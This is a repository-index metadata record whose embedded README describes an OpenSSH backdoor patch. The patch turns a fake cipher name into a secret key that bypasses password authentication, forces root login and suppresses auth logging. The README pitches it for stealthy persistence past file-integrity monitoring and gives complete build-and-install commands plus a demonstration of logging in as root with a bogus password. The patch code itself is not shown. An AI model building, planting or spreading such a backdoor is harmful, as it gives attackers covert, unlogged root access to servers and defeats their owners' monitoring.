{"id":20610888,"url":"https://github.com/psmths/openssh-backdoor","last_synced_at":"2026-02-18T00:31:55.533Z","repository":{"id":117461424,"uuid":"434408418","full_name":"Psmths/openssh-backdoor","owner":"Psmths","description":"Experimental and sneaky backdoor patch for OpenSSH Portable. ","archived":false,"fork":false,"pushed_at":"2021-12-21T01:19:04.000Z","size":14,"stargazers_count":24,"open_issues_count":0,"forks_count":8,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-10-20T12:59:09.578Z","etag":null,"topics":["backdoor","backdoor-attacks","openssh","patch","pentesting","pentesting-tools","red-team","ssh","ssh-server"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Psmths.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-02T23:43:06.000Z","updated_at":"2025-10-19T04:26:28.000Z","dependencies_parsed_at":null,"dependency_job_id":"ecc20cae-b8a6-4501-8041-ba01aa656f4d","html_url":"https://github.com/Psmths/openssh-backdoor","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/Psmths/openssh-backdoor","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmth
s%2Fopenssh-backdoor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Psmths","download_url":"https://codeload.github.com/Psmths/openssh-backdoor/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Psmths%2Fopenssh-backdoor/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29563467,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-17T21:50:49.831Z","status":"ssl_error","status_checked_at":"2026-02-17T21:46:15.313Z","response_time":100,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","backdoor-attacks","openssh","patch","pentesting","pentesting-tools","red-team","ssh","ssh-server"],"created_at":"2024-11-16T10:18:16.468Z","updated_at":"2026-02-18T00:31:55.502Z","avatar_url":"https://github.com/Psmths.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# openssh-backdoor\nExperimental backdoor for OpenSSH Portable. Patch for OpenSSH Portable v8.8_p1. 
For educational/ethical purposes only!\n\n## Why?\n\nConsider using this method when you want persistence, but:\n\n - FIM is monitoring configuration files, but not binaries\n - You don't want to create a new backdoor user \n - You don't want to deploy a reverse shell\n\n## How does it work?\n\nThis repo contains a patch for OpenSSH (server and client) to allow for a complete authentication bypass without modifying configuration files on the target server, adding new users, overwriting credentials, or deploying an implant such as a reverse shell. \n\nThe patch creates a dummy cipher suite, in this case `abs128-ctr`, that functions as an activation phrase. Any client that sends this dummy cipher spec during the SSH [algorithm negotiation](https://datatracker.ietf.org/doc/html/rfc4253#section-7.1) will completely bypass PASSWD authentication on the patched server, and will also bypass authentication logging. Clients connecting with normal cipher specs will authenticate as normal.\n\nAdditionally, the patch overrides `PermitRootLogin`, allowing clients sending the activation phrase to log in as root regardless of the OpenSSH server's restriction. \n\n## Installation and Patching \n\nThe following commands patch OpenSSH and produce a modified ssh client in `/tmp/ssh` and a modified server binary in `/tmp/sshd`. 
\n\n```\nwget https://github.com/openssh/openssh-portable/archive/refs/tags/V_8_8_P1.tar.gz\ngunzip V_8_8_P1.tar.gz\ntar xvf V_8_8_P1.tar\ngit clone https://github.com/Psmths/openssh-backdoor\ncp ./openssh-backdoor/*.patch ./openssh-portable-V_8_8_P1/\ncd openssh-portable-V_8_8_P1/\npatch -u auth-passwd.c -i auth-passwd.c.patch\npatch -u auth.c -i auth.c.patch\npatch -u cipher.c -i cipher.c.patch \npatch -u kex.c -i kex.c.patch\npatch -u kex.h -i kex.h.patch\npatch -u packet.h -i packet.h.patch\npatch -u packet.c -i packet.c.patch\npatch -u servconf.c -i servconf.c.patch\nautoreconf\n./configure --bindir=/tmp/ --sbindir=/tmp/\nmake -j 24\nsudo make install\n```\n\nTo test, run the modified server binary and set it to listen on some port:\n\n```\nsudo /tmp/sshd -p 9001\n```\n\nAttempt to authenticate without the special cipher suite string, and a bogus password. This should fail.\n```\n/tmp/ssh root@127.0.0.1 -p 9001 -c \"chacha20-poly1305@openssh.com\"\n```\n\nAttempt to authenticate with the special cipher suite string, in this case `abs128-ctr`, and a bogus password. This should successfully authenticate you as root. The backdoor authentication will not be logged either during login or logout. \n```\n/tmp/ssh root@127.0.0.1 -p 9001 -c \"abs128-ctr,chacha20-poly1305@openssh.com\"\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpsmths%2Fopenssh-backdoor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpsmths%2Fopenssh-backdoor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpsmths%2Fopenssh-backdoor/lists"}